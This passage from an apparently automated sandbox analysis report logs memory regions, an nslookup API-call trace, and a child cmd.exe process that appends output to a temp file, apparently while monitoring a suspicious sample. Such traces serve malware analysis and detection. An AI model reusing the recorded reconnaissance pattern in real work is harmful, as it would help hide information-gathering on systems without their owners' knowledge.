0x7ff61e0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff61dfe0000" filename = "" Region: id = 3016 start_va = 0x7ff61e10b000 end_va = 0x7ff61e10cfff entry_point = 0x0 region_type = private name = "private_0x00007ff61e10b000" filename = "" Region: id = 3017 start_va = 0x7ff973f10000 end_va = 0x7ff973fb7fff entry_point = 0x7ff973f10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3018 start_va = 0x7ff974170000 end_va = 0x7ff9741ccfff entry_point = 0x7ff974170000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3019 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3020 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3021 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3022 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3023 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3024 start_va = 0x7ff96aec0000 end_va = 0x7ff96aed4fff entry_point = 0x7ff96aec0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3025 start_va = 0x7ff96b3a0000 end_va = 0x7ff96b3b9fff entry_point = 0x7ff96b3a0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3026 start_va = 0x7ff9727e0000 end_va = 0x7ff9727f7fff entry_point = 0x7ff9727e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3027 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3028 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3029 start_va = 0xee68430000 end_va = 0xee68463fff entry_point = 0xee68430000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3030 start_va = 0xee68640000 end_va = 0xee687c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee68640000" filename = "" Region: id = 3031 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3032 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3033 start_va = 0xee68430000 end_va = 0xee68434fff entry_point = 0xee68430000 region_type = mapped_file name = "nslookup.exe.mui" filename = "\\Windows\\System32\\en-US\\nslookup.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\nslookup.exe.mui") Region: id = 3034 start_va = 0xee687d0000 end_va = 0xee68950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee687d0000" filename = "" Region: id = 3035 start_va = 0xee68960000 end_va = 0xee69d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee68960000" filename = "" Region: id = 3036 start_va = 0xee68440000 end_va = 0xee68440fff entry_point = 0x0 region_type = private name = "private_0x000000ee68440000" filename = "" Region: id = 3037 start_va = 0xee68450000 end_va = 0xee68450fff entry_point = 0x0 region_type = private name = "private_0x000000ee68450000" filename = "" Region: id = 3038 start_va = 0x7ff96c110000 end_va = 0x7ff96c11cfff entry_point = 0x7ff96c110000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3039 start_va = 0x7ff971f50000 end_va = 0x7ff971f87fff entry_point = 0x7ff971f50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3040 start_va = 0x7ff971f40000 end_va = 0x7ff971f4afff entry_point = 0x7ff971f40000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3041 start_va = 0x7ff96f5d0000 end_va = 0x7ff96f5e5fff entry_point = 0x7ff96f5d0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3042 start_va = 0x7ff96f5b0000 end_va = 0x7ff96f5c9fff entry_point = 0x7ff96f5b0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Thread: id = 263 os_tid = 0x510 [0276.843] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff61e670000 [0276.843] __set_app_type (_Type=0x1) [0276.843] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff61e67b450) returned 0x0 [0276.844] __getmainargs (in: _Argc=0x7ff61e684c48, _Argv=0x7ff61e684c50, _Env=0x7ff61e684c58, _DoWildCard=0, _StartInfo=0x7ff61e684c64 | out: _Argc=0x7ff61e684c48, _Argv=0x7ff61e684c50, _Env=0x7ff61e684c58) returned 0 [0276.844] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0276.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.847] strcmp (_Str1="127.0.0.1", _Str2="/help") returned 1 [0276.847] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x7ff61e685840 | out: lpWSAData=0x7ff61e685840) returned 0 [0276.852] socket (af=2, type=2, protocol=0) returned 0xa8 [0276.853] closesocket (s=0xa8) returned 0 [0276.853] RtlIpv4StringToAddressA () returned 0x0 [0276.854] RtlInitAnsiString (in: DestinationString=0xee682af8c0, SourceString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" | out: DestinationString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters") [0276.854] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8b0, SourceString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", AllocateDestinationString=1 | out: DestinationString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters") returned 0x0 [0276.854] NtOpenKey (in: KeyHandle=0xee682af988, DesiredAccess=0x20019, ObjectAttributes=0xee682af8d0*(Length=0x30, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0xee682af988*=0xa8) returned 0x0 [0276.854] RtlFreeAnsiString (AnsiString="\\") [0276.854] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8a0, SourceString="DNSLookupOrder", AllocateDestinationString=0 | out: DestinationString="DNSLookupOrder") returned 0x0 [0276.854] NtQueryValueKey (in: KeyHandle=0xa8, ValueName="DNSLookupOrder", KeyValueInformationClass=0x1, KeyValueInformation=0xee6847fa40, Length=0x400, ResultLength=0xee682af930 | out: KeyValueInformation=0xee6847fa40, ResultLength=0xee682af930) returned 0xc0000034 [0276.854] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8a0, SourceString="Domain", AllocateDestinationString=0 | out: DestinationString="Domain") returned 0x0 [0276.854] NtQueryValueKey (in: KeyHandle=0xa8, ValueName="Domain", KeyValueInformationClass=0x1, KeyValueInformation=0xee6847fa40, Length=0x400, ResultLength=0xee682af930 | out: KeyValueInformation=0xee6847fa40*(TitleIndex=0x0, Type=0x1, DataOffset=0x20, DataLength=0x2, NameLength=0xc, Name="Domain", Data=""), ResultLength=0xee682af930) returned 0x0 [0276.855] RtlUnicodeStringToAnsiString (in: DestinationString=0xee682af8b0, SourceString="", AllocateDestinationString=0 | out: DestinationString="") returned 0x0 [0276.855] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8a0, SourceString="DhcpDomain", AllocateDestinationString=0 | out: DestinationString="DhcpDomain") returned 0x0 [0276.855] NtQueryValueKey (in: KeyHandle=0xa8, ValueName="DhcpDomain", KeyValueInformationClass=0x1, KeyValueInformation=0xee6847fa40, Length=0x400, ResultLength=0xee682af930 | out: KeyValueInformation=0xee6847fa40, ResultLength=0xee682af930) returned 0xc0000034 [0276.855] RtlInitAnsiString (in: DestinationString=0xee682af8c0, SourceString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient" | out: DestinationString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient") [0276.855] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8b0, SourceString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient", AllocateDestinationString=1 | out: DestinationString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient") returned 0x0 [0276.855] NtOpenKey (in: KeyHandle=0xee682af990, DesiredAccess=0x20019, ObjectAttributes=0xee682af8d0*(Length=0x30, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0xee682af990*=0x0) returned 0xc0000034 [0276.855] RtlFreeAnsiString (AnsiString="\\") [0276.855] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8a0, SourceString="SearchList", AllocateDestinationString=0 | out: DestinationString="SearchList") returned 0x0 [0276.855] NtQueryValueKey (in: KeyHandle=0xa8, ValueName="SearchList", KeyValueInformationClass=0x1, KeyValueInformation=0xee6847fa40, Length=0x400, ResultLength=0xee682af930 | out: KeyValueInformation=0xee6847fa40, ResultLength=0xee682af930) returned 0xc0000034 [0276.855] RtlAnsiStringToUnicodeString (in: DestinationString=0xee682af8a0, SourceString="DhcpSearchList", AllocateDestinationString=0 | out: DestinationString="DhcpSearchList") returned 0x0 [0276.855] NtQueryValueKey (in: KeyHandle=0xa8, ValueName="DhcpSearchList", KeyValueInformationClass=0x1, KeyValueInformation=0xee6847fa40, Length=0x400, ResultLength=0xee682af930 | out: KeyValueInformation=0xee6847fa40, ResultLength=0xee682af930) returned 0xc0000034 [0276.855] gethostname (in: name=0xee686355a0, namelen=12800 | out: name="LHnIwsj") returned 0 [0276.916] getenv (_VarName="HOME") returned 0x0 [0276.916] DnsQueryConfigAllocEx () returned 0xee68491ce0 [0276.946] _vsnprintf_s (in: _DstBuf=0xee682af840, _DstSize=0x1f, _MaxCount=0x1e, _Format="%u.%u.%u.%u.in-addr.arpa.", _ArgList=0xee6829f7b8 | out: _DstBuf="1.0.168.192.in-addr.arpa.") returned 25 [0276.946] htons (hostshort=0x1) returned 0x100 [0276.946] htons (hostshort=0x1) returned 0x100 [0276.948] socket (af=2, type=2, protocol=0) returned 0x148 [0276.948] connect (s=0x148, name=0xee68491d00*(sa_family=2, sin_port=0x35, sin_addr="192.168.0.1"), namelen=16) returned 0 [0276.948] send (in: s=0x148, buf=0xee6829f840*, len=42, flags=0 | out: buf=0xee6829f840*) returned 42 [0276.949] select (in: nfds=328, readfds=0xee6828f260, writefds=0x0, exceptfds=0x0, timeout=0xee6828f240 | out: readfds=0xee6828f260, writefds=0x0, exceptfds=0x0) returned 1 [0276.949] recv (in: s=0x148, buf=0xee6828f7a0, len=65536, flags=0 | out: buf=0xee6828f7a0*) returned 42 [0276.949] closesocket (s=0x148) returned 0 [0276.949] RtlIpv4AddressToStringExA () returned 0xc000000d [0276.950] DnsFreeConfigStructure () returned 0x1 [0276.950] strcpy_s (in: _Dst=0xee68635880, _DstSize=0xc, _Src="UnKnown" | out: _Dst="UnKnown") returned 0x0 [0276.950] LocalAlloc (uFlags=0x40, uBytes=0x60) returned 0xee68491990 [0276.950] strcpy_s (in: _Dst=0x7ff61e685740, _DstSize=0x100, _Src="UnKnown" | out: _Dst="UnKnown") returned 0x0 [0276.950] __iob_func () returned 0x7ff97744e210 [0276.950] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x35, dwLanguageId=0x0, lpBuffer=0xee682af6f8, nSize=0x0, Arguments=0xee682af6f0 | out: lpBuffer="\x80\xa7\x48\x68\xee") returned 0x7 [0276.951] fprintf (in: _File=0x7ff97744e240, _Format="%-7s %s" | out: _File=0x7ff97744e240) returned 16 [0276.951] fprintf (in: _File=0x7ff97744e240, _Format="\nAddress:" | out: _File=0x7ff97744e240) returned 9 [0276.951] inet_ntoa (in=0x100a8c0) returned="192.168.0.1" [0276.951] fprintf (in: _File=0x7ff97744e240, _Format="%c %s" | out: _File=0x7ff97744e240) returned 13 [0276.951] fprintf (in: _File=0x7ff97744e240, _Format="\n\n" | out: _File=0x7ff97744e240) returned 2 [0276.951] RtlIpv4StringToAddressA () returned 0x0 [0276.951] _vsnprintf_s (in: _DstBuf=0xee682af560, _DstSize=0x1f, _MaxCount=0x1e, _Format="%u.%u.%u.%u.in-addr.arpa.", _ArgList=0xee6829f4d8 | out: _DstBuf="1.0.0.127.in-addr.arpa.") returned 23 [0276.951] htons (hostshort=0x2) returned 0x200 [0276.951] htons (hostshort=0x1) returned 0x100 [0276.951] socket (af=2, type=2, protocol=0) returned 0x148 [0276.951] connect (s=0x148, name=0xee684919b0*(sa_family=2, sin_port=0x35, sin_addr="192.168.0.1"), namelen=16) returned 0 [0276.952] send (in: s=0x148, buf=0xee6829f560*, len=40, flags=0 | out: buf=0xee6829f560*) returned 40 [0276.952] select (in: nfds=328, readfds=0xee6828ef80, writefds=0x0, exceptfds=0x0, timeout=0xee6828ef60 | out: readfds=0xee6828ef80, writefds=0x0, exceptfds=0x0) returned 1 [0276.953] recv (in: s=0x148, buf=0xee6828f4c0, len=65536, flags=0 | out: buf=0xee6828f4c0*) returned 63 [0276.953] closesocket (s=0x148) returned 0 [0276.954] htons (hostshort=0x100) returned 0x1 [0276.954] htons (hostshort=0x100) returned 0x1 [0276.954] htons (hostshort=0x0) returned 0x0 [0276.954] htons (hostshort=0x0) returned 0x0 [0276.954] LocalAlloc (uFlags=0x40, uBytes=0x60) returned 0xee68491a00 [0276.954] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x31, dwLanguageId=0x0, lpBuffer=0xee682af658, nSize=0x0, Arguments=0xee682af650 | out: lpBuffer="\xa0\xa7\x48\x68\xee") returned 0x5 [0276.954] fprintf (in: _File=0x7ff97744e240, _Format="%-7s %s" | out: _File=0x7ff97744e240) returned 18 [0276.954] fprintf (in: _File=0x7ff97744e240, _Format="\nAddress:" | out: _File=0x7ff97744e240) returned 9 [0276.954] inet_ntoa (in=0x100007f) returned="127.0.0.1" [0276.954] fprintf (in: _File=0x7ff97744e240, _Format="%c %s" | out: _File=0x7ff97744e240) returned 11 [0276.954] fprintf (in: _File=0x7ff97744e240, _Format="\n\n" | out: _File=0x7ff97744e240) returned 2 [0276.954] LocalFree (hMem=0xee68491990) returned 0x0 [0276.954] exit (_Code=0) Thread: id = 264 os_tid = 0x794 Thread: id = 265 os_tid = 0x954 Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3d74f000" os_pid = "0xa1c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3043 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3044 start_va = 0x4be240000 end_va = 0x4be25ffff entry_point = 0x0 region_type = private name = "private_0x00000004be240000" filename = "" Region: id = 3045 start_va = 0x4be260000 end_va = 0x4be273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004be260000" filename = "" Region: id = 3046 start_va = 0x4be280000 end_va = 0x4be37ffff entry_point = 0x0 region_type = private name = "private_0x00000004be280000" filename = "" Region: id = 3047 start_va = 0x4be380000 end_va = 0x4be383fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004be380000" filename = "" Region: id = 3048 start_va = 0x4be390000 end_va = 0x4be390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004be390000" filename = "" Region: id = 3049 start_va = 0x4be3a0000 end_va = 0x4be3a1fff entry_point = 0x0 region_type = private name = "private_0x00000004be3a0000" filename = "" Region: id = 3050 start_va = 0x7df5ffaa0000 end_va = 0x7ff5ffa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffaa0000" filename = "" Region: id = 3051 start_va = 0x7ff60cef0000 end_va = 0x7ff60cf12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60cef0000" filename = "" Region: id = 3052 start_va = 0x7ff60cf1d000 end_va = 0x7ff60cf1efff entry_point = 0x0 region_type = private name = "private_0x00007ff60cf1d000" filename = "" Region: id = 3053 start_va = 0x7ff60cf1f000 end_va = 0x7ff60cf1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff60cf1f000" filename = "" Region: id = 3054 start_va = 0x7ff60d9c0000 end_va = 0x7ff60da18fff entry_point = 0x7ff60d9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 3055 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3056 start_va = 0x4be560000 end_va = 0x4be65ffff entry_point = 0x0 region_type = private name = "private_0x00000004be560000" filename = "" Region: id = 3057 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3058 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 266 os_tid = 0xbb0 Process: id = "35" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d7d6000" os_pid = "0x38c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xa1c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3059 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3060 start_va = 0x5211b90000 end_va = 0x5211baffff entry_point = 0x0 region_type = private name = "private_0x0000005211b90000" filename = "" Region: id = 3061 start_va = 0x5211bb0000 end_va = 0x5211bc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005211bb0000" filename = "" Region: id = 3062 start_va = 0x5211bd0000 end_va = 0x5211c0ffff entry_point = 0x0 region_type = private name = "private_0x0000005211bd0000" filename = "" Region: id = 3063 start_va = 0x7df5ffae0000 end_va = 0x7ff5ffadffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffae0000" filename = "" Region: id = 3064 start_va = 0x7ff684020000 end_va = 0x7ff684042fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff684020000" filename = "" Region: id = 3065 start_va = 0x7ff684047000 end_va = 0x7ff684047fff entry_point = 0x0 region_type = private name = "private_0x00007ff684047000" filename = "" Region: id = 3066 start_va = 0x7ff68404e000 end_va = 0x7ff68404ffff entry_point = 0x0 region_type = private name = "private_0x00007ff68404e000" filename = "" Region: id = 3067 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3068 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 267 os_tid = 0x20c